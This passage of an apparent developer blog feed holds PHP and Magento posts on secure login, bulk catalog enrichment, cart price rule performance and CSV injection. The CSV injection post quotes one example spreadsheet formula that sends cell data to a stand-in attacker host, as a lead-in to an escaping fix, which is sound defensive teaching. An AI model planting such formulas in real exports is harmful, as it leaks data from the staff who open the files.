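&lt;p&gt;Track two keys per attempt, such as &lt;code&gt;'email:' . $email&lt;/code&gt; and &lt;code&gt;'ip:' . $ip&lt;/code&gt;, and check &lt;code&gt;isBlocked()&lt;/code&gt; for both before you touch the password.&lt;/p&gt;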

&lt;h2&gt;
  
  
  The shape of a correct login
&lt;/h2&gt;

&lt;p&gt;Put together, the whole thing is short:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="nv"&gt;$stmt&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$pdo&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;prepare&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'SELECT id, password_hash FROM users WHERE email = ?'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nv"&gt;$stmt&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;execute&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="nv"&gt;$email&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
&lt;span class="nv"&gt;$user&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$stmt&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;fetch&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nv"&gt;$user&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nb"&gt;password_verify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$password&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$user&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'password_hash'&lt;/span&gt;&lt;span class="p"&gt;]))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// generic error, bump the rate-limit counter&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;fail&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'Invalid email or password'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nb"&gt;session_regenerate_id&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nv"&gt;$_SESSION&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'user_id'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;int&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;$user&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'id'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No custom crypto. No string-built SQL. One error message. A fresh session. A counter on top.&lt;/p&gt;

&lt;p&gt;None of this is new. &lt;code&gt;password_hash()&lt;/code&gt; landed in PHP 5.5, prepared statements are older still, and &lt;code&gt;session_regenerate_id()&lt;/code&gt; has been there the whole time. The tools are old and boring. The mistakes survive because the tutorials never caught up.&lt;/p&gt;

&lt;p&gt;If you maintain a PHP app with hand-rolled auth, read your login controller today. The fix is usually five small edits, not a rewrite.&lt;/p&gt;

</description>
      <category>php</category>
      <category>security</category>
      <category>backend</category>
    </item>
    <item>
      <title>Enriching a large Magento catalog without melting the indexer</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Fri, 26 Jun 2026 09:16:09 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/enriching-a-large-magento-catalog-without-melting-the-indexer-3mk9</link>
      <guid>https://dev.to/iamrobindhiman/enriching-a-large-magento-catalog-without-melting-the-indexer-3mk9</guid>
      <description>&lt;p&gt;Every few weeks the same question shows up in a Magento forum: thousands of SKUs, missing attributes, thin descriptions, no translations. How do I enrich all of it? The replies are always about sources. Icecat for attributes. An LLM for descriptions. A feed for the marketplace fields.&lt;/p&gt;

&lt;p&gt;Sourcing the data has a thousand tutorials. Getting it into the catalog without taking the store down has almost none. That second part is the actual job.&lt;/p&gt;

&lt;h2&gt;
  
  
  The mistake everyone makes first
&lt;/h2&gt;

&lt;p&gt;You write the obvious loop. Load product, set value, save.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="k"&gt;foreach&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$productIds&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="nv"&gt;$id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$product&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;productRepository&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;getById&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$id&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nv"&gt;$product&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;setData&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'description'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$descriptions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;$id&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
    &lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;productRepository&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;save&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$product&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every &lt;code&gt;save()&lt;/code&gt; runs the full product lifecycle: validation, every save-after observer and plugin, and a reindex trigger. At 50,000 products you've fired that machinery 50,000 times. The script runs for hours, the indexer thrashes, and the admin grinds while it does.&lt;/p&gt;

&lt;p&gt;The product save path is built for a human editing one product in the admin. It is the wrong tool for touching the whole catalog.&lt;/p&gt;

&lt;h2&gt;
  
  
  Set shared values in bulk
&lt;/h2&gt;

&lt;p&gt;When you're writing the same value to many products (a marketplace flag, a country of manufacture, a default brand), Magento already ships the right tool:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Magento\Catalog\Model\Product\Action&lt;/span&gt;
&lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;productAction&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;updateAttributes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="nv"&gt;$batchOfIds&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                       &lt;span class="c1"&gt;// 1-2k entity IDs per call&lt;/span&gt;
    &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'country_of_manufacture'&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="s1"&gt;'IN'&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="nv"&gt;$storeId&lt;/span&gt;                           &lt;span class="c1"&gt;// 0 = default scope&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;updateAttributes()&lt;/code&gt; writes straight to the attribute's backend table for the whole batch and skips the full model save. One operation instead of N lifecycles. For genuinely distinct values per product, like unique descriptions, group your writes and keep them off the &lt;code&gt;productRepository-&amp;gt;save()&lt;/code&gt; path. The moment you're saving the full model in a loop, you've already lost.&lt;/p&gt;
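
&lt;p&gt;The batching itself can be sketched in plain PHP. The helper name &lt;code&gt;applyInBatches()&lt;/code&gt; is hypothetical, and the batch size of 1,000 simply follows the 1-2k range used above:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;// Hypothetical helper: split the ID list and hand each batch to a writer.
// Returns the number of batches processed.
function applyInBatches(array $productIds, int $batchSize, callable $writeBatch): int
{
    $batches = 0;
    foreach (array_chunk($productIds, $batchSize) as $batchOfIds) {
        $writeBatch($batchOfIds); // one bulk write per batch, not per product
        $batches++;
    }

    return $batches;
}

// Inside a Magento class, the writer would wrap the updateAttributes() call:
// applyInBatches($allIds, 1000, function (array $ids) use ($storeId) {
//     $this-&amp;gt;productAction-&amp;gt;updateAttributes($ids, ['country_of_manufacture' =&amp;gt; 'IN'], $storeId);
// });
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Keeping the writer a callable means you can dry-run the batching with a logger before you point it at the catalog.&lt;/p&gt;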

&lt;h2&gt;
  
  
  Put the indexer on schedule before you start
&lt;/h2&gt;

&lt;p&gt;Switch your indexers to &lt;strong&gt;Update by Schedule&lt;/strong&gt; before any bulk run.&lt;/p&gt;

&lt;p&gt;On &lt;em&gt;Update on Save&lt;/em&gt;, every write reindexes synchronously and your enrichment job fights the indexer for the whole run. On schedule, writes drop into the changelog and mview reindexes only the changed rows on cron. You enrich fast, then reindex the delta once.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bin/magento indexer:set-mode schedule
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Translations live at store-view scope
&lt;/h2&gt;

&lt;p&gt;A translated description isn't a column on the product. It's an attribute value scoped to a store view. Write German to the German store view's id, not to the default scope. And don't clobber the default value with one language while you're at it.&lt;/p&gt;

&lt;p&gt;That &lt;code&gt;$storeId&lt;/code&gt; argument on &lt;code&gt;updateAttributes()&lt;/code&gt; is the same lever: pass the store-view id to set the localized value, and leave the global value alone.&lt;/p&gt;

&lt;h2&gt;
  
  
  The AI part, on a short leash
&lt;/h2&gt;

&lt;p&gt;An LLM will draft decent product copy across thousands of SKUs in one pass. It will also state, with total confidence, that a cable is 2 metres, a shirt is 100% cotton, and a case fits a phone it has never heard of.&lt;/p&gt;

&lt;p&gt;So treat generated copy as a draft, never as truth:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Generate into a staging field or a disabled scope, not straight onto the live product page.&lt;/li&gt;
&lt;li&gt;Sample-review a real slice before you trust the batch.&lt;/li&gt;
&lt;li&gt;Keep anything load-bearing (dimensions, materials, compatibility, claims) sourced and verified, not generated.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A wrong spec on a product page is a returns problem, and on regulated goods it's a bigger one than that.&lt;/p&gt;

&lt;h2&gt;
  
  
  An order of operations that survives 50k SKUs
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Indexers to &lt;strong&gt;scheduled&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Enrich into staging: a holding field or a disabled scope nobody can see yet.&lt;/li&gt;
&lt;li&gt;Bulk-apply in batches of 1-2k IDs, off the full save path.&lt;/li&gt;
&lt;li&gt;Reindex the delta, then smoke-test a real sample of product pages.&lt;/li&gt;
&lt;li&gt;Only then flip visibility.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The data sources are the easy 20%. The catalog is a live system with an indexer, a cache, and customers on it. Enrich it like one and 50,000 SKUs is a non-event. Loop over &lt;code&gt;save()&lt;/code&gt; and you'll find out how long an afternoon can be.&lt;/p&gt;

</description>
      <category>magento2</category>
      <category>php</category>
      <category>performance</category>
    </item>
    <item>
      <title>Why Magento cart price rules get slow at checkout (and how to find the culprit)</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Wed, 24 Jun 2026 15:16:51 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/why-magento-cart-price-rules-get-slow-at-checkout-and-how-to-find-the-culprit-1dfd</link>
      <guid>https://dev.to/iamrobindhiman/why-magento-cart-price-rules-get-slow-at-checkout-and-how-to-find-the-culprit-1dfd</guid>
      <description>&lt;p&gt;I have watched a checkout get slower every time the marketing team shipped a new promotion. Not the product page. Not the cart. The totals step: the recalculation Magento runs after every add, remove, or quantity change. Each new cart price rule added a little more lag, and nobody connected the rules to the slowdown.&lt;/p&gt;

&lt;p&gt;Here is what's actually going on under the hood.&lt;/p&gt;

&lt;h2&gt;
  
  
  Cart price rules run in PHP, on every recalculation
&lt;/h2&gt;

&lt;p&gt;A cart price rule is not a stored discount sitting in a column. It is a tree of conditions and a set of actions that Magento evaluates at runtime.&lt;/p&gt;

&lt;p&gt;Every time the quote changes, Magento recollects totals. Discount collection is one stage of that pass, handled by &lt;code&gt;Magento\SalesRule\Model\Quote\Discount&lt;/code&gt;. During it, Magento takes the rules that apply to the current cart and validates each rule's conditions against the quote items.&lt;/p&gt;

&lt;p&gt;That validation is PHP. A loop over rules, and inside it, condition checks against items held in memory. There is no single clever query that returns "the right discount." It is procedural evaluation, and it reruns on every recalculation of the cart.&lt;/p&gt;

&lt;p&gt;So the cost scales with two numbers: how many rules apply, and how expensive each rule is to check.&lt;/p&gt;

&lt;h2&gt;
  
  
  The pre-filter is doing more than you think
&lt;/h2&gt;

&lt;p&gt;Magento does not evaluate every row in &lt;code&gt;salesrule&lt;/code&gt;. The rule collection is narrowed first by website, customer group, coupon, and the current date before any conditions are checked. A rule scoped to one website and one customer group gets dropped early for everyone else.&lt;/p&gt;

&lt;p&gt;This is the cheapest performance win available, and most stores ignore it. Start by counting what is actually live:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;rule_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;from_date&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;to_date&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sort_order&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;salesrule&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;is_active&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
  &lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;to_date&lt;/span&gt; &lt;span class="k"&gt;IS&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt; &lt;span class="k"&gt;OR&lt;/span&gt; &lt;span class="n"&gt;to_date&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="n"&gt;CURDATE&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
&lt;span class="k"&gt;ORDER&lt;/span&gt; &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;sort_order&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If that returns 200 rows and your business runs maybe a dozen real promotions, you have 188 rules that are still candidates on every cart change for no reason. Finished campaigns that never got an end date and were never disabled. "Temporary" rules from two years ago. Each one is still work.&lt;/p&gt;

&lt;p&gt;Disable what you don't use. Scope what you keep as tightly as the campaign allows.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conditions are where the time goes
&lt;/h2&gt;

&lt;p&gt;Not all conditions cost the same.&lt;/p&gt;

&lt;p&gt;A condition on subtotal or quantity is cheap. The values are already on the quote. A condition that asks "does the cart contain a product in category X" is not. Category membership has to be resolved per item.&lt;/p&gt;

&lt;p&gt;Worse are conditions on product attributes. When a rule references a product attribute, Magento has to make that attribute available on the items during validation. It tracks which attributes rules care about in &lt;code&gt;salesrule_product_attribute&lt;/code&gt;, then loads them so the conditions can run. Reference a heavy or rarely-loaded attribute in a rule condition and you have added an attribute load to a hot path.&lt;/p&gt;

&lt;p&gt;The lesson: build conditions out of data the quote already has. Reach for category and attribute conditions only when a campaign genuinely needs them, and know you are paying for them on every recalculation.&lt;/p&gt;

&lt;h2&gt;
  
  
  The table everyone forgets: salesrule_coupon
&lt;/h2&gt;

&lt;p&gt;Auto-generated coupon batches live in &lt;code&gt;salesrule_coupon&lt;/code&gt;. Generate a million codes for a campaign and the table holds a million rows. Lookups by code are indexed, so a single redemption stays fast, but the table itself grows without bound because expired campaigns rarely get cleaned up.&lt;/p&gt;

&lt;p&gt;Check its size. If it is large and most of the codes belong to dead campaigns, archive them.&lt;/p&gt;

&lt;h2&gt;
  
  
  Finding the actual culprit
&lt;/h2&gt;

&lt;p&gt;Two ways, fastest first.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Binary-search the rules.&lt;/strong&gt; Disable half the active rules, reproduce the cart flow, measure. Narrow until one rule stands out. Crude, but it works in minutes and needs no tooling.&lt;/p&gt;
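
&lt;p&gt;The bisection itself is simple enough to sketch. This assumes exactly one rule is responsible and that you have some way to measure the cart flow with a given set of rules enabled. &lt;code&gt;findSlowRule()&lt;/code&gt; and &lt;code&gt;$isSlowWith&lt;/code&gt; are hypothetical names, and the measurement here is simulated.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;/**
 * Hypothetical bisection over rule IDs. $isSlowWith receives the rule IDs
 * left enabled and returns true if the cart flow is still slow.
 * Assumes exactly one rule is responsible.
 */
function findSlowRule(array $ruleIds, callable $isSlowWith): ?int
{
    $candidates = array_values($ruleIds);
    if ($candidates === [] || !$isSlowWith($candidates)) {
        return null; // nothing to search, or the slowdown is not rule-driven
    }

    while (count($candidates) &amp;gt; 1) {
        $half = array_slice($candidates, 0, intdiv(count($candidates), 2));
        // Keep whichever half still reproduces the slowdown.
        $candidates = $isSlowWith($half)
            ? $half
            : array_slice($candidates, count($half));
    }

    return $candidates[0];
}

// Simulated measurement: rule 37 is the expensive one.
$culprit = findSlowRule(
    range(1, 200),
    fn (array $enabled): bool =&amp;gt; in_array(37, $enabled, true)
);
var_dump($culprit); // int(37)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;With 200 rules that is about eight measurements. If several rules are each a little slow, no single half will stand out, and that is the "too many rules" shape rather than the "one bad rule" shape.&lt;/p&gt;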

&lt;p&gt;&lt;strong&gt;Profile it.&lt;/strong&gt; Point Blackfire or Xdebug's profiler at a cart update and look at the time spent under the discount totals collector and the sales rule validator. The expensive rule shows up as the condition path that dominates.&lt;/p&gt;

&lt;p&gt;You are looking for one of two shapes: too many rules being validated, or one rule whose conditions are doing real work per item.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I would do, in order
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Count active rules. Disable the dead ones. This alone often fixes it.&lt;/li&gt;
&lt;li&gt;Tighten scope (website, customer group, dates) so the pre-filter throws rules out early.&lt;/li&gt;
&lt;li&gt;Audit conditions. Replace category and attribute conditions with cheaper ones wherever the campaign allows.&lt;/li&gt;
&lt;li&gt;Check &lt;code&gt;salesrule_coupon&lt;/code&gt; size and archive spent batches.&lt;/li&gt;
&lt;li&gt;Only then reach for the profiler, with a specific rule in your sights.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Promotions feel like a marketing concern until they show up in your checkout timings. They run on every cart change, in PHP, and they compound quietly. Treat the rule table like code: review it, delete what's dead, and keep the conditions cheap.&lt;/p&gt;

</description>
      <category>magento2</category>
      <category>performance</category>
      <category>php</category>
    </item>
    <item>
      <title>CSV injection: the export button that runs code on someone else's machine</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Tue, 23 Jun 2026 04:11:48 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/csv-injection-the-export-button-that-runs-code-on-someone-elses-machine-3ki6</link>
      <guid>https://dev.to/iamrobindhiman/csv-injection-the-export-button-that-runs-code-on-someone-elses-machine-3ki6</guid>
      <description>&lt;p&gt;A customer fills in their name. They type &lt;code&gt;=HYPERLINK("http://evil.example/?leak="&amp;amp;A2,"click")&lt;/code&gt;. Your validation passes. It's just text, after all. Weeks later someone on your finance team exports the customer list to CSV, opens it in Excel, and that cell stops being text. It becomes a formula.&lt;/p&gt;

&lt;p&gt;That's CSV injection. Also called formula injection. It's one of the most common bugs in e-commerce admin panels, and almost nobody tests for it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why a string turns into a formula
&lt;/h2&gt;

&lt;p&gt;When a spreadsheet app opens a CSV, it doesn't treat every cell as plain text. If a cell starts with &lt;code&gt;=&lt;/code&gt;, &lt;code&gt;+&lt;/code&gt;, &lt;code&gt;-&lt;/code&gt;, or &lt;code&gt;@&lt;/code&gt;, Excel, LibreOffice, and Google Sheets all read it as the start of a formula.&lt;/p&gt;

&lt;p&gt;So a field holding &lt;code&gt;=1+1&lt;/code&gt; shows &lt;code&gt;2&lt;/code&gt;. Harmless. But formulas do more than arithmetic. They can build a URL out of other cells and nudge the user into clicking it. On some setups they can reach out to the network. Older Excel could even launch external commands through DDE if the user clicked past the warnings.&lt;/p&gt;

&lt;p&gt;The pattern is the same. Data your app stored as text becomes executable the moment a human opens the file. And the person who opens it is usually staff, the people with the most access.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where this hides in a store
&lt;/h2&gt;

&lt;p&gt;Anywhere you export user-controlled data:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Customer name and address exports&lt;/li&gt;
&lt;li&gt;Order grids exported to CSV&lt;/li&gt;
&lt;li&gt;Product feeds from third-party vendors&lt;/li&gt;
&lt;li&gt;Contact form and newsletter dumps&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The attacker never needs admin access. They set their own name, their company name, or a product title in a feed, then wait for someone on your side to export and open it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The fix
&lt;/h2&gt;

&lt;p&gt;Sanitize on the way out, when you write the CSV. Not on the way in. Input validation is the wrong layer here, because the value is legitimate text right up until a spreadsheet reads it.&lt;/p&gt;

&lt;p&gt;If a cell value starts with &lt;code&gt;=&lt;/code&gt;, &lt;code&gt;+&lt;/code&gt;, &lt;code&gt;-&lt;/code&gt;, &lt;code&gt;@&lt;/code&gt;, a tab, or a carriage return, prefix it with a single quote:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;csvSafe&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt; &lt;span class="nv"&gt;$value&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt; &lt;span class="kt"&gt;string&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$value&lt;/span&gt; &lt;span class="o"&gt;!==&lt;/span&gt; &lt;span class="s1"&gt;''&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;in_array&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$value&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'='&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'+'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'-'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'@'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\t&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\r&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="s2"&gt;"'"&lt;/span&gt; &lt;span class="mf"&gt;.&lt;/span&gt; &lt;span class="nv"&gt;$value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nv"&gt;$value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



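&lt;p&gt;The leading quote tells the spreadsheet "this is text." Some applications hide it and some show it in the cell, so check how your exports look, but either way the value no longer runs as a formula. Run every field through this before it reaches the file. That's the whole fix.&lt;/p&gt;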
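
&lt;p&gt;Here is one way to wire that guard into an export, as a sketch rather than a drop-in. &lt;code&gt;writeSafeCsv()&lt;/code&gt; is a hypothetical helper. It inlines the same first-character check as &lt;code&gt;csvSafe()&lt;/code&gt; above so the snippet runs on its own, and it writes to an in-memory stream instead of a real file.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;/**
 * Hypothetical export helper: guard every cell, then let fputcsv() handle
 * quoting and delimiters. The guard mirrors csvSafe().
 */
function writeSafeCsv($handle, iterable $rows): void
{
    $triggers = ['=', '+', '-', '@', "\t", "\r"];

    foreach ($rows as $row) {
        $safe = array_map(static function ($cell) use ($triggers): string {
            $value = (string) $cell; // numbers and nulls become strings first
            return ($value !== '' &amp;amp;&amp;amp; in_array($value[0], $triggers, true))
                ? "'" . $value
                : $value;
        }, $row);

        // Explicit delimiter, enclosure, and (empty) escape character.
        fputcsv($handle, $safe, ',', '"', '');
    }
}

$out = fopen('php://memory', 'w+');
writeSafeCsv($out, [
    ['name', 'city'],
    ['=HYPERLINK("http://evil.example/","click")', 'Pune'],
]);
rewind($out);
echo stream_get_contents($out);
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;One trade-off to be aware of: a guard this strict also prefixes legitimate negative numbers such as &lt;code&gt;-5&lt;/code&gt;. Whether that is acceptable depends on who consumes the file.&lt;/p&gt;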

&lt;h2&gt;
  
  
  Two things people get wrong
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Escaping in the database.&lt;/strong&gt; Don't. The value is fine in your database, fine in your HTML where you already encode output, and dangerous only in a CSV. Guard it at the CSV boundary so you don't mangle the data everywhere else.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Trusting your own exports.&lt;/strong&gt; The customer who set their name to a formula is attacking your staff, not your customers. "It's only an internal export" is exactly why it works.&lt;/p&gt;

&lt;p&gt;CSV injection has no scary scanner alert and no CVE filed against your app. It just sits in the export button you shipped two years ago. Go look at what writes your CSVs. If nothing guards the first character of each cell, you have it too.&lt;/p&gt;

</description>
      <category>websecurity</category>
      <category>php</category>
      <category>ecommerce</category>
    </item>
    <item>
      <title>The EAV tax: why Magento product loads are slow</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Mon, 22 Jun 2026 15:29:34 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/the-eav-tax-why-magento-product-loads-are-slow-117h</link>
      <guid>https://dev.to/iamrobindhiman/the-eav-tax-why-magento-product-loads-are-slow-117h</guid>
